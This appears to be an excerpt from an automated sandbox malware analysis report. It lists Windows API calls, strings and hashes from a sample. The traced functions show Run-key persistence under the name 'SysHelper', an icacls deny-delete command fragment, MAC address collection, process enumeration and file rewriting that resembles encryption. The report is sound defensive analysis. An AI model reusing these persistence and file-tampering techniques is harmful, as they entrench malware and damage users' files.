                                                                                                                            • __CxxThrowException@8.LIBCMT ref: 00E4107A
                                                                                                                            • CryptGetHashParam.ADVAPI32(00000000,00000002,00000000,?,00000000,?,00000000,?,00000000), ref: 00E41099
                                                                                                                            • __CxxThrowException@8.LIBCMT ref: 00E410AB
                                                                                                                            • _memset.LIBCMT ref: 00E410CA
                                                                                                                            • CryptGetHashParam.ADVAPI32(00000000,00000002,00000000,00000000,00000000), ref: 00E410DE
                                                                                                                            • __CxxThrowException@8.LIBCMT ref: 00E410F0
                                                                                                                            • _malloc.LIBCMT ref: 00E41100
                                                                                                                            • _memset.LIBCMT ref: 00E4110B
                                                                                                                            • _sprintf.LIBCMT ref: 00E4112E
                                                                                                                            • lstrcatA.KERNEL32(?,?), ref: 00E4113C
                                                                                                                            • CryptDestroyHash.ADVAPI32(00000000), ref: 00E41154
                                                                                                                            • CryptReleaseContext.ADVAPI32(00000000,00000000), ref: 00E4115F
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000003.00000002.2913878626.0000000000E31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00E30000, based on PE: true
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: Crypt$Exception@8HashThrow$ContextParam_memset$AcquireCreateDataDestroyExceptionRaiseRelease_malloc_sprintflstrcatlstrlen
                                                                                                                            • String ID: %.2X
                                                                                                                            • API String ID: 2451520719-213608013
                                                                                                                            • Opcode ID: 195f295856dd1e18212c8c2725cffb19731845addb0a4e5eb9b9fefb1643d92e
                                                                                                                            • Instruction ID: 6f9007e78f5a8d6ea40817d17772fbbe4fb97d622646531f5a5180f26f4cb852
                                                                                                                            • Opcode Fuzzy Hash: 195f295856dd1e18212c8c2725cffb19731845addb0a4e5eb9b9fefb1643d92e
                                                                                                                            • Instruction Fuzzy Hash: 68519071D40219ABDF11DBA0DD46FEFBBB8EB04754F200025FA01B6180EB75AA058BA5
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            APIs
                                                                                                                              • Part of subcall function 00E41AB0: PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00E41ACA
                                                                                                                              • Part of subcall function 00E41AB0: DispatchMessageW.USER32(?), ref: 00E41AE0
                                                                                                                              • Part of subcall function 00E41AB0: PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00E41AEE
                                                                                                                            • PathFindFileNameW.SHLWAPI(?,?,00000000,000000FF,?,00000000), ref: 00E3F900
                                                                                                                            • _memmove.LIBCMT ref: 00E3F9EA
                                                                                                                            • PathFindFileNameW.SHLWAPI(?,?,00000000,00000000,00000000,-00000002), ref: 00E3FA51
                                                                                                                            • _memmove.LIBCMT ref: 00E3FADA
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000003.00000002.2913878626.0000000000E31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00E30000, based on PE: true
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: Message$FileFindNamePathPeek_memmove$Dispatch
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 273148273-0
                                                                                                                            • Opcode ID: 4fce4c88232433783588d2ab034b6b584b9a930a9ce07f1d64c9f520685a7665
                                                                                                                            • Instruction ID: c74bc96d4b34e552105705b15a4870b34f14ebb69d5c9ad35c2397cd138422f9
                                                                                                                            • Opcode Fuzzy Hash: 4fce4c88232433783588d2ab034b6b584b9a930a9ce07f1d64c9f520685a7665
                                                                                                                            • Instruction Fuzzy Hash: CE527C71D00208DBDF14DFA8D889BDEBBF5BF04308F209569E819B7251E775AA48CB91
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Control-flow Graph

                                                                                                                            • Executed
                                                                                                                            • Not Executed
                                                                                                                            control_flow_graph 1515 e3e870-e3e8d6 call e456d0 CryptAcquireContextW 1518 e3e8e9-e3e901 CryptCreateHash 1515->1518 1519 e3e8d8-e3e8e4 call e60eca 1515->1519 1521 e3e903-e3e90f call e60eca 1518->1521 1522 e3e914-e3e930 CryptHashData 1518->1522 1519->1518 1521->1522 1524 e3e943-e3e961 CryptGetHashParam 1522->1524 1525 e3e932-e3e93e call e60eca 1522->1525 1527 e3e963-e3e96f call e60eca 1524->1527 1528 e3e974-e3e9a6 call e50be4 call e5b420 CryptGetHashParam 1524->1528 1525->1524 1527->1528 1534 e3e9b9-e3e9bb 1528->1534 1535 e3e9a8-e3e9b4 call e60eca 1528->1535 1537 e3e9c0-e3e9c3 1534->1537 1535->1534 1538 e3ea10-e3ea31 call e52110 CryptDestroyHash CryptReleaseContext 1537->1538 1539 e3e9c5-e3e9df call e504a6 1537->1539 1544 e3ea33-e3ea3b call e52587 1538->1544 1545 e3ea3e-e3ea50 1538->1545 1546 e3e9f2-e3e9f5 1539->1546 1547 e3e9e1-e3e9f0 call e43ea0 1539->1547 1544->1545 1548 e3e9f8-e3e9fd 1546->1548 1547->1537 1548->1548 1551 e3e9ff-e3ea0e call e43ea0 1548->1551 1551->1537
                                                                                                                            APIs
                                                                                                                            • CryptAcquireContextW.ADVAPI32(00000000,00000000,00000000,00000001,F0000000,00F2FCA4,00000000,00000000), ref: 00E3E8CE
                                                                                                                            • __CxxThrowException@8.LIBCMT ref: 00E3E8E4
                                                                                                                              • Part of subcall function 00E60ECA: RaiseException.KERNEL32(?,?,00E7F26B,?,?,00000000,?,?,?,?,00E7F26B,?,00F381FC,?), ref: 00E60F1F
                                                                                                                            • CryptCreateHash.ADVAPI32(00000000,00008003,00000000,00000000,00000000), ref: 00E3E8F9
                                                                                                                            • __CxxThrowException@8.LIBCMT ref: 00E3E90F
                                                                                                                            • CryptHashData.ADVAPI32(00000000,00000000,?,00000000), ref: 00E3E928
                                                                                                                            • __CxxThrowException@8.LIBCMT ref: 00E3E93E
                                                                                                                            • CryptGetHashParam.ADVAPI32(00000000,00000002,00000000,?,00000000), ref: 00E3E95D
                                                                                                                            • __CxxThrowException@8.LIBCMT ref: 00E3E96F
                                                                                                                            • _memset.LIBCMT ref: 00E3E98E
                                                                                                                            • CryptGetHashParam.ADVAPI32(00000000,00000002,00000000,00000000,00000000), ref: 00E3E9A2
                                                                                                                            • __CxxThrowException@8.LIBCMT ref: 00E3E9B4
                                                                                                                            • _sprintf.LIBCMT ref: 00E3E9D3
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000003.00000002.2913878626.0000000000E31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00E30000, based on PE: true
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: CryptException@8Throw$Hash$Param$AcquireContextCreateDataExceptionRaise_memset_sprintf
                                                                                                                            • String ID: %.2X
                                                                                                                            • API String ID: 1084002244-213608013
                                                                                                                            • Opcode ID: 6c77d3a99924bdc09836b80646e5daa72205c5d3e5c470e4b1b47a05c13f7ad2
                                                                                                                            • Instruction ID: 9cf40764fe0aab6f004ee9dd8fccc8e878b951d75fb054b3ffb0a6b7aaddead5
                                                                                                                            • Opcode Fuzzy Hash: 6c77d3a99924bdc09836b80646e5daa72205c5d3e5c470e4b1b47a05c13f7ad2
                                                                                                                            • Instruction Fuzzy Hash: C6517E71D40209AADF11DFA0DD46FEEBBB8EB44744F205429F901B6281EB75AA05CBA1
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Control-flow Graph

                                                                                                                            • Executed
                                                                                                                            • Not Executed
                                                                                                                            control_flow_graph 1556 e3eaa0-e3eb09 call e456d0 CryptAcquireContextW 1559 e3eb0b-e3eb17 call e60eca 1556->1559 1560 e3eb1c-e3eb34 CryptCreateHash 1556->1560 1559->1560 1562 e3eb47-e3eb56 CryptHashData 1560->1562 1563 e3eb36-e3eb42 call e60eca 1560->1563 1565 e3eb69-e3eb87 CryptGetHashParam 1562->1565 1566 e3eb58-e3eb64 call e60eca 1562->1566 1563->1562 1567 e3eb9a-e3ebcc call e50be4 call e5b420 CryptGetHashParam 1565->1567 1568 e3eb89-e3eb95 call e60eca 1565->1568 1566->1565 1575 e3ebdf 1567->1575 1576 e3ebce-e3ebda call e60eca 1567->1576 1568->1567 1578 e3ebe1-e3ebe4 1575->1578 1576->1575 1579 e3ebe6-e3ec00 call e504a6 1578->1579 1580 e3ec38-e3ec67 call e52110 CryptDestroyHash CryptReleaseContext 1578->1580 1585 e3ec13-e3ec19 1579->1585 1586 e3ec02-e3ec11 call e43ea0 1579->1586 1588 e3ec20-e3ec25 1585->1588 1586->1578 1588->1588 1590 e3ec27-e3ec36 call e43ea0 1588->1590 1590->1578
                                                                                                                            APIs
                                                                                                                            • CryptAcquireContextW.ADVAPI32(00000000,00000000,00000000,00000001,F0000000,00F2FCA4,00000000,00000000,00000000,?), ref: 00E3EB01
                                                                                                                            • __CxxThrowException@8.LIBCMT ref: 00E3EB17
                                                                                                                              • Part of subcall function 00E60ECA: RaiseException.KERNEL32(?,?,00E7F26B,?,?,00000000,?,?,?,?,00E7F26B,?,00F381FC,?), ref: 00E60F1F
                                                                                                                            • CryptCreateHash.ADVAPI32(00000000,00008003,00000000,00000000,00000000), ref: 00E3EB2C
                                                                                                                            • __CxxThrowException@8.LIBCMT ref: 00E3EB42
                                                                                                                            • CryptHashData.ADVAPI32(00000000,00000000,00000000,00000000), ref: 00E3EB4E
                                                                                                                            • __CxxThrowException@8.LIBCMT ref: 00E3EB64
                                                                                                                            • CryptGetHashParam.ADVAPI32(00000000,00000002,00000000,?,00000000), ref: 00E3EB83
                                                                                                                            • __CxxThrowException@8.LIBCMT ref: 00E3EB95
                                                                                                                            • _memset.LIBCMT ref: 00E3EBB4
                                                                                                                            • CryptGetHashParam.ADVAPI32(00000000,00000002,00000000,00000000,00000000), ref: 00E3EBC8
                                                                                                                            • __CxxThrowException@8.LIBCMT ref: 00E3EBDA
                                                                                                                            • _sprintf.LIBCMT ref: 00E3EBF4
                                                                                                                            • CryptDestroyHash.ADVAPI32(00000000), ref: 00E3EC44
                                                                                                                            • CryptReleaseContext.ADVAPI32(00000000,00000000), ref: 00E3EC4F
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000003.00000002.2913878626.0000000000E31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00E30000, based on PE: true
                                                                                                                            • Associated: 00000003.00000002.2913842192.0000000000E30000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                            • Associated: 00000003.00000002.2913987224.0000000000EFC000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                            • Associated: 00000003.00000002.2914042821.0000000000F3A000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                            • Associated: 00000003.00000002.2914079083.0000000000F3C000.00000008.00000001.01000000.00000007.sdmp
                                                                                                                            • Associated: 00000003.00000002.2914117982.0000000000F40000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                            • Associated: 00000003.00000002.2914117982.0000000000F4A000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                            • Associated: 00000003.00000002.2914117982.0000000000F59000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                            • Associated: 00000003.00000002.2914228176.0000000000F5B000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_3_2_e30000_3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_paylo.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: Crypt$Exception@8HashThrow$ContextParam$AcquireCreateDataDestroyExceptionRaiseRelease_memset_sprintf
                                                                                                                            • String ID: %.2X
                                                                                                                            • API String ID: 1637485200-213608013
                                                                                                                            • Opcode ID: ae92682d5a3be0d614144fa5bb9622e816cf1dc51ecfa5971b8e74984772e9a3
                                                                                                                            • Instruction ID: 3250f2ba1b2318b738636712bead2f93d23b4c5e4dc991d9ddb11b408a43f232
                                                                                                                            • Opcode Fuzzy Hash: ae92682d5a3be0d614144fa5bb9622e816cf1dc51ecfa5971b8e74984772e9a3
                                                                                                                            • Instruction Fuzzy Hash: 6A51A371D40219ABDF11DBA0DD46FEFBBB8EB44754F201425F901B6280DB75AA05CB61
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Control-flow Graph

                                                                                                                            APIs
                                                                                                                            • _malloc.LIBCMT ref: 00E3E67F
                                                                                                                              • Part of subcall function 00E50C62: __FF_MSGBANNER.LIBCMT ref: 00E50C79
                                                                                                                              • Part of subcall function 00E50C62: __NMSG_WRITE.LIBCMT ref: 00E50C80
                                                                                                                              • Part of subcall function 00E50C62: RtlAllocateHeap.NTDLL(012D0000,00000000,00000001,00000000,00000000,00000000,?,00E58CF4,00000000,00000000,00000000,00000000,?,00E58BE1,00000018,00F37BD0), ref: 00E50CA5
                                                                                                                            • _malloc.LIBCMT ref: 00E3E68B
                                                                                                                            • _wprintf.LIBCMT ref: 00E3E69E
                                                                                                                            • _free.LIBCMT ref: 00E3E6A4
                                                                                                                              • Part of subcall function 00E50BED: HeapFree.KERNEL32(00000000,00000000,?,00E5507F,00000000,00E5500D,?,00E53F7C,?,00E4E6CC,00000000), ref: 00E50C01
                                                                                                                              • Part of subcall function 00E50BED: GetLastError.KERNEL32(00000000,?,00E5507F,00000000,00E5500D,?,00E53F7C,?,00E4E6CC,00000000,?,?,?,?,?,00EFB3EC), ref: 00E50C13
                                                                                                                            • GetAdaptersInfo.IPHLPAPI(00000000,00000288), ref: 00E3E6B9
                                                                                                                            • _free.LIBCMT ref: 00E3E6C5
                                                                                                                            • _malloc.LIBCMT ref: 00E3E6CD
                                                                                                                            • GetAdaptersInfo.IPHLPAPI(00000000,00000288), ref: 00E3E6E0
                                                                                                                            • _sprintf.LIBCMT ref: 00E3E720
                                                                                                                            • _wprintf.LIBCMT ref: 00E3E732
                                                                                                                            • _wprintf.LIBCMT ref: 00E3E73C
                                                                                                                            • _free.LIBCMT ref: 00E3E745
                                                                                                                            Strings
                                                                                                                            • Address: %s, mac: %s, xrefs: 00E3E72D
                                                                                                                            • %02X:%02X:%02X:%02X:%02X:%02X, xrefs: 00E3E71A
                                                                                                                            • Error allocating memory needed to call GetAdaptersinfo, xrefs: 00E3E699
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000003.00000002.2913878626.0000000000E31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00E30000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_3_2_e30000_3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_paylo.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: _free_malloc_wprintf$AdaptersHeapInfo$AllocateErrorFreeLast_sprintf
                                                                                                                            • String ID: %02X:%02X:%02X:%02X:%02X:%02X$Address: %s, mac: %s$Error allocating memory needed to call GetAdaptersinfo
                                                                                                                            • API String ID: 3901070236-1604013687
                                                                                                                            • Opcode ID: d65e4a4880837a76c70cdfcbe93605f6c3d5bba9891eaeb0c9ad9be9033d9ee0
                                                                                                                            • Instruction ID: 3d01832964c692b7679718ede17faec40f01c246b1b0802a603daa6e29e7b6b5
                                                                                                                            • Opcode Fuzzy Hash: d65e4a4880837a76c70cdfcbe93605f6c3d5bba9891eaeb0c9ad9be9033d9ee0
                                                                                                                            • Instruction Fuzzy Hash: 6A110AB25046647AC26163B55C16FFF7BDC8F46713F0405A5FE98F1241EA589A08A3B2
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Control-flow Graph

                                                                                                                            APIs
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000003.00000002.2913878626.0000000000E31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00E30000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_3_2_e30000_3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_paylo.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: Path$AppendExistsFile_free_malloc_memmovelstrcatlstrcpy
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 3232302685-0
                                                                                                                            • Opcode ID: 15861775f9850bbd48382c31b17c13e41f9f1ab55ca70dab8054cb2c95abc24f
                                                                                                                            • Instruction ID: 3929b43e09db9fd0387b8148d89e0b284ca45b301257153d3834aaceec9a5f41
                                                                                                                            • Opcode Fuzzy Hash: 15861775f9850bbd48382c31b17c13e41f9f1ab55ca70dab8054cb2c95abc24f
                                                                                                                            • Instruction Fuzzy Hash: 4AB17E70D00209DADF20DFA4D849BEEBBB5FF15308F605469E409BB251E7319A49CF56
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Control-flow Graph

                                                                                                                            APIs
                                                                                                                            • RegOpenKeyExW.KERNEL32(80000001,Software\Microsoft\Windows\CurrentVersion\Run,00000000,000F003F,?,?,?,?,?,?,00EFAC68,000000FF), ref: 00E41D12
                                                                                                                            • _memset.LIBCMT ref: 00E41D3B
                                                                                                                            • RegQueryValueExW.KERNEL32(?,SysHelper,00000000,?,?,00000400), ref: 00E41D63
                                                                                                                            • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00EFAC68,000000FF), ref: 00E41D6C
                                                                                                                            • lstrlenA.KERNEL32(" --AutoStart,?,?), ref: 00E41DD6
                                                                                                                            • PathFileExistsW.SHLWAPI(?,?,?,?,?,?,?,?,?,?,?,?,?,00000001,-00000001), ref: 00E41E48
                                                                                                                            • LoadLibraryW.KERNEL32(Shell32.dll,?,?), ref: 00E41E99
                                                                                                                            • GetProcAddress.KERNEL32(00000000,SHGetFolderPathW), ref: 00E41EA5
                                                                                                                            • GetCommandLineW.KERNEL32 ref: 00E41EB4
                                                                                                                            • CommandLineToArgvW.SHELL32(00000000,00000000), ref: 00E41EBF
                                                                                                                            • lstrcpyW.KERNEL32(?,00000000), ref: 00E41ECE
                                                                                                                            • PathFindFileNameW.SHLWAPI(?), ref: 00E41EDB
                                                                                                                            • UuidCreate.RPCRT4(?), ref: 00E41EFC
                                                                                                                            • UuidToStringW.RPCRT4(?,?), ref: 00E41F14
                                                                                                                            • RpcStringFreeW.RPCRT4(00000000), ref: 00E41F64
                                                                                                                            • PathAppendW.SHLWAPI(?,?), ref: 00E41F83
                                                                                                                            • CreateDirectoryW.KERNEL32(?,00000000), ref: 00E41F8E
                                                                                                                            • PathAppendW.SHLWAPI(?,?,?,?), ref: 00E4202D
                                                                                                                            • DeleteFileW.KERNEL32(?), ref: 00E42036
                                                                                                                            • CopyFileW.KERNEL32(?,?,00000000), ref: 00E4204C
                                                                                                                            • RegOpenKeyExW.ADVAPI32(80000001,Software\Microsoft\Windows\CurrentVersion\Run,00000000,000F003F,?), ref: 00E4206E
                                                                                                                            • _memset.LIBCMT ref: 00E42090
                                                                                                                            • lstrcpyW.KERNEL32(?,00F302FC), ref: 00E420AA
                                                                                                                            • lstrcatW.KERNEL32(?,?), ref: 00E420C0
                                                                                                                            • lstrcatW.KERNEL32(?," --AutoStart), ref: 00E420CE
                                                                                                                            • lstrlenW.KERNEL32(?), ref: 00E420D7
                                                                                                                            • RegSetValueExW.ADVAPI32(00000000,SysHelper,00000000,00000002,?,00000000), ref: 00E420F3
                                                                                                                            • RegCloseKey.ADVAPI32(00000000), ref: 00E420FC
                                                                                                                            • _memset.LIBCMT ref: 00E42120
                                                                                                                            • SetLastError.KERNEL32(00000000), ref: 00E42146
                                                                                                                            • lstrcpyW.KERNEL32(?,icacls "), ref: 00E42158
                                                                                                                            • lstrcatW.KERNEL32(?,?), ref: 00E4216D
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000003.00000002.2913878626.0000000000E31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00E30000, based on PE: true
                                                                                                                            • Associated: 00000003.00000002.2913842192.0000000000E30000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                            • Associated: 00000003.00000002.2913987224.0000000000EFC000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                            • Associated: 00000003.00000002.2914042821.0000000000F3A000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                            • Associated: 00000003.00000002.2914079083.0000000000F3C000.00000008.00000001.01000000.00000007.sdmp
                                                                                                                            • Associated: 00000003.00000002.2914117982.0000000000F40000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                            • Associated: 00000003.00000002.2914117982.0000000000F4A000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                            • Associated: 00000003.00000002.2914117982.0000000000F59000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                            • Associated: 00000003.00000002.2914228176.0000000000F5B000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_3_2_e30000_3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_paylo.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: FilePath$_memsetlstrcatlstrcpy$AppendCloseCommandCreateLineOpenStringUuidValuelstrlen$AddressArgvCopyDeleteDirectoryErrorExistsFindFreeLastLibraryLoadNameProcQuery
                                                                                                                            • String ID: " --AutoStart$" --AutoStart$" /deny *S-1-1-0:(OI)(CI)(DE,DC)$D$SHGetFolderPathW$Shell32.dll$Software\Microsoft\Windows\CurrentVersion\Run$SysHelper$icacls "
                                                                                                                            • API String ID: 2589766509-1182136429
                                                                                                                            • Opcode ID: 7f06bb7286dd101111ce262e842e2ad4e881863734f805340186754f4906e3a9
                                                                                                                            • Instruction ID: 1476c86f32745e256d9ad02768f0e62f82456a37079306ab4cb2390ff7e91fbd
                                                                                                                            • Opcode Fuzzy Hash: 7f06bb7286dd101111ce262e842e2ad4e881863734f805340186754f4906e3a9
                                                                                                                            • Instruction Fuzzy Hash: 6DE15071D4021DABDF24DBA0DD59BEEB7B8AF04304F2040A9E605F7191EB74AA89CF50
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Control-flow Graph

                                                                                                                            APIs
                                                                                                                            • CreateFileW.KERNEL32(00000000,C0000000,00000001,00000000,00000003,00000080,00000000,?,00000000,?), ref: 00E4120F
                                                                                                                            • GetFileSizeEx.KERNEL32(00000000,?,?,00000000,?), ref: 00E41228
                                                                                                                            • CloseHandle.KERNEL32(00000000,?,00000000,?), ref: 00E4123D
                                                                                                                            • MoveFileW.KERNEL32(00000000,?), ref: 00E41277
                                                                                                                            • VirtualAlloc.KERNEL32(00000000,00025815,00001000,00000004,?,00000000,?), ref: 00E412B1
                                                                                                                            • _memset.LIBCMT ref: 00E412C8
                                                                                                                            • SetFilePointerEx.KERNEL32(00000000,?,00000000,00000000,00000000,?,00000000,?), ref: 00E41301
                                                                                                                            • VirtualFree.KERNEL32(00000000,00000000,00008000,?,00000000,?), ref: 00E41314
                                                                                                                            • CloseHandle.KERNEL32(00000000,?,00000000,?), ref: 00E4131B
                                                                                                                            • ReadFile.KERNEL32(00000000,00000000,00000026,?,00000000,?,00000000,?), ref: 00E41349
                                                                                                                            • VirtualFree.KERNELBASE(00000000,00000000,00008000,00000000,?,00000000,?), ref: 00E41381
                                                                                                                            • CloseHandle.KERNEL32(00000000,?,00000000,?), ref: 00E41388
                                                                                                                            • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,?), ref: 00E413E6
                                                                                                                            • ReadFile.KERNEL32(00000000,00000000,00025805,?,00000000,?,00000000,?), ref: 00E41409
                                                                                                                            • VirtualFree.KERNEL32(00000000,00000000,00008000,?,00000000,?), ref: 00E41417
                                                                                                                            • CloseHandle.KERNEL32(00000000,?,00000000,?), ref: 00E4141E
                                                                                                                            • lstrlenA.KERNEL32(?,?,00000000,?), ref: 00E41471
                                                                                                                            • lstrlenA.KERNEL32(?,?,?,00000000,?), ref: 00E41491
                                                                                                                            • lstrlenA.KERNEL32(?,00000000,?,?,?,?,?,00000000,?), ref: 00E414CF
                                                                                                                            • SetFilePointer.KERNEL32(00000000,00000005,00000000,00000000,00000005,00000000,-000000FB,-000000FB,00000000,00000000,000000FF,00000000,00000000,00000000), ref: 00E4159D
                                                                                                                            • SetFilePointerEx.KERNEL32(00000000,?,00000000,00000000,00000000,?,00000000,?), ref: 00E415D0
                                                                                                                            • WriteFile.KERNEL32(00000000,?,00000000,00000000,00000000,?,00000000,?), ref: 00E415F8
                                                                                                                            • WriteFile.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,00000000,?,00000000), ref: 00E41649
                                                                                                                            • lstrlenA.KERNEL32({36A698B9-D67C-4E07-BE82-0EC5B14B4DF5},00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00E4166B
                                                                                                                            • WriteFile.KERNEL32(00000000,{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5},00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00E41678
                                                                                                                            • CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000000,?,00000000,?), ref: 00E4168D
                                                                                                                            • MoveFileW.KERNEL32(?,?), ref: 00E416D6
                                                                                                                            • VirtualFree.KERNELBASE(00000000,00000000,00008000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00E416EB
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000003.00000002.2913878626.0000000000E31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00E30000, based on PE: true
                                                                                                                            • Associated: 00000003.00000002.2913842192.0000000000E30000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                            • Associated: 00000003.00000002.2913987224.0000000000EFC000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                            • Associated: 00000003.00000002.2914042821.0000000000F3A000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                            • Associated: 00000003.00000002.2914079083.0000000000F3C000.00000008.00000001.01000000.00000007.sdmp
                                                                                                                            • Associated: 00000003.00000002.2914117982.0000000000F40000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                            • Associated: 00000003.00000002.2914117982.0000000000F4A000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                            • Associated: 00000003.00000002.2914117982.0000000000F59000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                            • Associated: 00000003.00000002.2914228176.0000000000F5B000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_3_2_e30000_3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_paylo.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: File$CloseHandleVirtual$FreePointerlstrlen$Write$MoveRead$AllocCreateSize_memset
                                                                                                                            • String ID: {36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
                                                                                                                            • API String ID: 254274740-1186676987
                                                                                                                            • Opcode ID: 7f72af5a84a085d7840261cdad283b813733e9e396082c66c057857ba91d0e91
                                                                                                                            • Instruction ID: 9f4ff016a21059c7de822988004a7bfef97b1270c368c23d6c0952a0006ff551
                                                                                                                            • Opcode Fuzzy Hash: 7f72af5a84a085d7840261cdad283b813733e9e396082c66c057857ba91d0e91
                                                                                                                            • Instruction Fuzzy Hash: 60228A70D00208AFEF14DFA4EC85BEEB7B8EF45304F6041A9F515B6291DB706A89CB65
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Control-flow Graph

                                                                                                                            APIs
                                                                                                                            • GetCommandLineW.KERNEL32 ref: 00E42235
                                                                                                                            • CommandLineToArgvW.SHELL32(00000000,?), ref: 00E42240
                                                                                                                            • PathFindFileNameW.SHLWAPI(00000000), ref: 00E42248
                                                                                                                            • LoadLibraryW.KERNEL32(kernel32.dll), ref: 00E42256
                                                                                                                            • GetProcAddress.KERNEL32(00000000,EnumProcesses), ref: 00E4226A
                                                                                                                            • GetProcAddress.KERNEL32(00000000,EnumProcessModules), ref: 00E42275
                                                                                                                            • GetProcAddress.KERNEL32(00000000,GetModuleBaseNameW), ref: 00E42280
                                                                                                                            • LoadLibraryW.KERNEL32(Psapi.dll), ref: 00E42291
                                                                                                                            • GetProcAddress.KERNEL32(00000000,EnumProcesses), ref: 00E4229F
                                                                                                                            • GetProcAddress.KERNEL32(00000000,EnumProcessModules), ref: 00E422AA
                                                                                                                            • GetProcAddress.KERNEL32(00000000,GetModuleBaseNameW), ref: 00E422B5
                                                                                                                            • K32EnumProcesses.KERNEL32(?,0000A000,?), ref: 00E422CD
                                                                                                                            • OpenProcess.KERNEL32(00000410,00000000,?), ref: 00E422FE
                                                                                                                            • K32EnumProcessModules.KERNEL32(00000000,?,00000004,?), ref: 00E42315
                                                                                                                            • K32GetModuleBaseNameW.KERNEL32(00000000,?,?,00000400), ref: 00E4232C
                                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 00E42347
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000003.00000002.2913878626.0000000000E31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00E30000, based on PE: true
                                                                                                                            • Associated: 00000003.00000002.2913842192.0000000000E30000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                            • Associated: 00000003.00000002.2913987224.0000000000EFC000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                            • Associated: 00000003.00000002.2914042821.0000000000F3A000.00000004.00000001.01000000.00000007.sdmp
